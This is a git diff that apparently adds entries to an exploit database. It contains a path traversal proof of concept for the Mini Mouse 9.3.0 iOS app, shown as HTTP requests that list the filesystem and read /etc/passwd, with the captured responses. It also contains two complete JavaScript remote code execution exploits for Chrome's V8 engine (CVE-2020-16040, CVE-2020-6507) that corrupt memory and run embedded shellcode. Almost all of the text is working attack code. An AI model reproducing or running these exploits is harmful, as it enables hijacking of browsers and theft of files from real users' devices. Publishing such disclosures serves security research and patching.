diff --git a/exploits/ios/webapps/49747.txt b/exploits/ios/webapps/49747.txt new file mode 100644 index 000000000..0e9c08659 --- /dev/null +++ b/exploits/ios/webapps/49747.txt @@ -0,0 +1,397 @@ +# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal +# Author: gosh +# Date: 05-04-2021 +# Vendor Homepage: http://yodinfo.com +# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948 +# Version: 9.3.0 +# Tested on: iPhone; iOS 14.4.2 + +GET /op=get_device_info HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 0 + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/json +Content-Range: bytes 0-0/-1 + +{ + "ret_code": 1, + "ret_msg": "success", + "data": { + "uuid": "7E07125B-61BE-4F12-820C-FA706C445219", + "model": "iPhone", + "sys_name": "iOS", + "sys_version": "14.4.2", + "battery_state": 0, + "battery_level": -1, + "memery_total_size": 2983772160, + "device_name": "mobile", + "user_name": "iPhone", + "pwd": "", + "dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download", + "dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents", + "dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop", + "sys_type": 3 + } +} + + + +------------------------------------------------------------------------------------- + + +POST /op=get_file_list HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 0 + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/json +Content-Range: bytes 0-0/-1 + +{ + "ret_code": 1, + "ret_msg": "success", + "data": { + "list": [{ + "path": "//usr", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "usr", + "name_display": "usr", + "file_size": 288, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//bin", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "bin", + "name_display": "bin", + "file_size": 128, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//sbin", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "sbin", + "name_display": "sbin", + "file_size": 544, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//.file", + "is_local": true, + "is_hide": true, + "is_floder": false, + "name": ".file", + "name_display": ".file", + "file_size": 0, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//etc", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "etc", + "name_display": "etc", + "file_size": 11, + "create_time": 1577865.600000, + "update_time": 1577865.600000, + "sys_type": 3 + }, { + "path": "//System", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "System", + "name_display": "System", + "file_size": 128, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//var", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "var", + "name_display": "var", + "file_size": 11, + "create_time": 1577865.600000, + "update_time": 1577865.600000, + "sys_type": 3 + }, { + "path": "//Library", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Library", + "name_display": "Library", + "file_size": 672, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//private", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "private", + "name_display": "private", + "file_size": 224, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//dev", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "dev", + "name_display": "dev", + "file_size": 1395, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//.ba", + "is_local": true, + "is_hide": true, + "is_floder": true, + "name": ".ba", + "name_display": ".ba", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//.mb", + "is_local": true, + "is_hide": true, + "is_floder": true, + "name": ".mb", + "name_display": ".mb", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//tmp", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "tmp", + "name_display": "tmp", + "file_size": 15, + "create_time": 1577865.600000, + "update_time": 1577865.600000, + "sys_type": 3 + }, { + "path": "//Applications", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Applications", + "name_display": "Applications", + "file_size": 3296, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//Developer", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Developer", + "name_display": "Developer", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }, { + "path": "//cores", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "cores", + "name_display": "cores", + "file_size": 64, + "create_time": 0, + "update_time": 0, + "sys_type": 3 + }] + } +} + +------------------------- +using the data found: +/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download + +POST /op=get_file_list HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 101 + +{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"} + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/json +Content-Range: bytes 0-0/-1 + +{ + "ret_code": 1, + "ret_msg": "success", + "data": { + "list": [{ + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "GDT", + "name_display": "GDT", + "file_size": 96, + "create_time": 1617228.400302, + "update_time": 1617228.400302, + "sys_type": 3 + }, { + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg", + "is_local": true, + "is_hide": false, + "is_floder": false, + "name": "input_photo.jpg", + "name_display": "input_photo.jpg", + "file_size": 6141491, + "create_time": 1617583.738397, + "update_time": 1617583.738402, + "sys_type": 3 + }, { + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Ico", + "name_display": "Ico", + "file_size": 64, + "create_time": 1617583.334913, + "update_time": 1617583.334913, + "sys_type": 3 + }, { + "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download", + "is_local": true, + "is_hide": false, + "is_floder": true, + "name": "Download", + "name_display": "Download", + "file_size": 64, + "create_time": 1617228.371587, + "update_time": 1617228.371587, + "sys_type": 3 + }] + } +} + +---------------------------------------------------------------------- + +GET /file=/etc/passwd HTTP/1.1 +Host: 192.168.1.104:8039 +Accept: */* +Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 +Connection: keep-alive +Accept-Encoding: gzip, deflate +User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) +Content-Length: 4 + +{} + + +HTTP/1.1 200 OK +Server: bruce_wy/1.0.0 +Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS +Access-Control-Allow-Headers: Content-Type,Origin,Accept +Access-Control-Allow-Origin: * +Access-Control-Allow-Credentials: true +P3P: CP=CAO PSA OUR +Content-Type: application/octet-stream +Content-Range: bytes 0-0/2018 +Content-Length : 2018 + +## +# User Database +# +# This file is the authoritative user database. +## + +nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false +root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh +mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh +daemon:*:1:1:System Services:/var/root:/usr/bin/false +_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false +_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false +_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false +_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false +_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false +_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false +_securityd:*:64:64:securityd:/var/empty:/usr/bin/false +_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false +_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false +_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false +_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false +_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false +_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false +_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false +_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false +_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false +_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false +_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false +_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false +_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false +_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false +_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false +_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false +_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false +_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false +_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false \ No newline at end of file diff --git a/exploits/multiple/remote/49745.js b/exploits/multiple/remote/49745.js new file mode 100644 index 000000000..da4ccf84d --- /dev/null +++ b/exploits/multiple/remote/49745.js @@ -0,0 +1,111 @@ +# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution +# Date: 05/04/2021 +# Exploit Author: Tobias Marcotto +# Original Author: r4j0x00 +# Tested on: Kali Linux x64 +# Version: 87.0.4280.88 +# Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. +# CVE: CVE-2020-16040 +# Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/ + +********************************************************************************************************* + + +var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) +var wasm_mod = new WebAssembly.Module(wasm_code); +var wasm_instance = new WebAssembly.Instance(wasm_mod); +var f = wasm_instance.exports.main; + +var buf = new ArrayBuffer(8); +var f64_buf = new Float64Array(buf); +var u64_buf = new Uint32Array(buf); +let buf2 = new ArrayBuffer(0x150); + +function ftoi(val) { + f64_buf[0] = val; + return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); +} + +function itof(val) { + u64_buf[0] = Number(val & 0xffffffffn); + u64_buf[1] = Number(val >> 32n); + return f64_buf[0]; +} + +function foo(a) { + var y = 0x7fffffff; + + if (a == NaN) y = NaN; + if (a) y = -1; + + let z = y + 1; + z >>= 31; + z = 0x80000000 - Math.sign(z|1); + + if(a) z = 0; + + var arr = new Array(0-Math.sign(z)); + arr.shift(); + var cor = [1.1, 1.2, 1.3]; + + return [arr, cor]; +} + +for(var i=0;i<0x3000;++i) + foo(true); + +var x = foo(false); +var arr = x[0]; +var cor = x[1]; + +const idx = 6; +arr[idx+10] = 0x4242; + +function addrof(k) { + arr[idx+1] = k; + return ftoi(cor[0]) & 0xffffffffn; +} + +function fakeobj(k) { + cor[0] = itof(k); + return arr[idx+1]; +} + +var float_array_map = ftoi(cor[3]); + +var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; +var fake = fakeobj(addrof(arr2) + 0x20n); + +function arbread(addr) { + if (addr % 2n == 0) { + addr += 1n; + } + arr2[1] = itof((2n << 32n) + addr - 8n); + return (fake[0]); +} + +function arbwrite(addr, val) { + if (addr % 2n == 0) { + addr += 1n; + } + arr2[1] = itof((2n << 32n) + addr - 8n); + fake[0] = itof(BigInt(val)); +} + +function copy_shellcode(addr, shellcode) { + let dataview = new DataView(buf2); + let buf_addr = addrof(buf2); + let backing_store_addr = buf_addr + 0x14n; + arbwrite(backing_store_addr, addr); + + for (let i = 0; i < shellcode.length; i++) { + dataview.setUint32(4*i, shellcode[i], true); + } +} + +var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); +console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); +var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; +/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode +copy_shellcode(rwx_page_addr, shellcode); +f(); \ No newline at end of file diff --git a/exploits/multiple/remote/49746.js b/exploits/multiple/remote/49746.js new file mode 100644 index 000000000..1f59d0927 --- /dev/null +++ b/exploits/multiple/remote/49746.js @@ -0,0 +1,146 @@ +# Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution +# Date: 05/04/2021 +# Exploit Author: Tobias Marcotto +# Original Author: r4j0x00 +# Tested on: Kali Linux x64 +# Version: 83.0.4103.106 +# Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. +# CVE: CVE-2020-6507 + + +********************************************************************************************************* + + +var buf = new ArrayBuffer(8); +var f64_buf = new Float64Array(buf); +var u64_buf = new Uint32Array(buf); + +var arraybuf = new ArrayBuffer(0x13373); +var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]); +var mod = new WebAssembly.Module(wasm_code); +var wasm_instance = new WebAssembly.Instance(mod); +var shell = wasm_instance.exports.shell; +var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337]; + +var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]); + +function ftoi(val) { + f64_buf[0] = val; + return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); +} +function itof(val) { + u64_buf[0] = Number(val & 0xffffffffn); + u64_buf[1] = Number(val >> 32n); + return f64_buf[0]; +} + +array = Array(0x40000).fill(1.1); +args = Array(0x100 - 1).fill(array); +args.push(Array(0x40000 - 4).fill(2.2)); +giant_array = Array.prototype.concat.apply([], args); +giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3); + +length_as_double = + new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0]; + +function trigger(array) { + var x = array.length; + x -= 67108861; + x = Math.max(x, 0); + x *= 6; + x -= 5; + x = Math.max(x, 0); + + let corrupting_array = [0.1, 0.1]; + let corrupted_array = [0.1]; + + corrupting_array[x] = length_as_double; + return [corrupting_array, corrupted_array]; +} + +for (let i = 0; i < 30000; ++i) { + trigger(giant_array); +} + +corrupted_array = trigger(giant_array)[1]; + +var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]]; +function searchmem(value) +{ + skip = 0; + for(i=0; i> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value)) + { + if(skip++ == 2) // Probably the first two are due to the search itself + return j; + } + } + } + return -1; +} + +function searchmem_full(value) +{ + for(i=0;i> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n)) + { + return j; + } + } + } + } + return -1; +} + +var arraybuf_idx = searchmem(0x13373n); +if(arraybuf_idx == -1) +{ + alert('Failed 1'); + throw new Error("Not found"); +} +document.write("Found arraybuf at idx: " + arraybuf_idx + "
"); +function arb_read(addr, length) +{ + var data = []; + let u8_arraybuf = new Uint8Array(arraybuf); + corrupted_array[arraybuf_idx+1] = itof(addr); + for(i=0;i"); +rwx_idx = Number((wasm_addr-1n+0x68n)/8n); +rwx_addr = ftoi(corrupted_array[rwx_idx-1]); +if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn) +{ + rwx_addr >>= 32n; + rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n; +} +document.write("rwx addr: 0x"+rwx_addr.toString(16)); +arb_write(rwx_addr, shellcode); +shell(); \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a0775b42d..ecf4932db 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18436,6 +18436,8 @@ id,file,description,date,author,type,platform,port 49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware, 49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",2021-03-22,LiquidWorm,remote,hardware, 49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",2021-03-29,xynmaps,remote,multiple, +49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple, +49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43922,3 +43924,4 @@ id,file,description,date,author,type,platform,port 49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",2021-04-05,"Michael Ikua",webapps,php, 49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",2021-04-05,gosh,webapps,windows, 49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",2021-04-05,gosh,webapps,windows, +49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion / Path Traversal",2021-04-06,gosh,webapps,ios,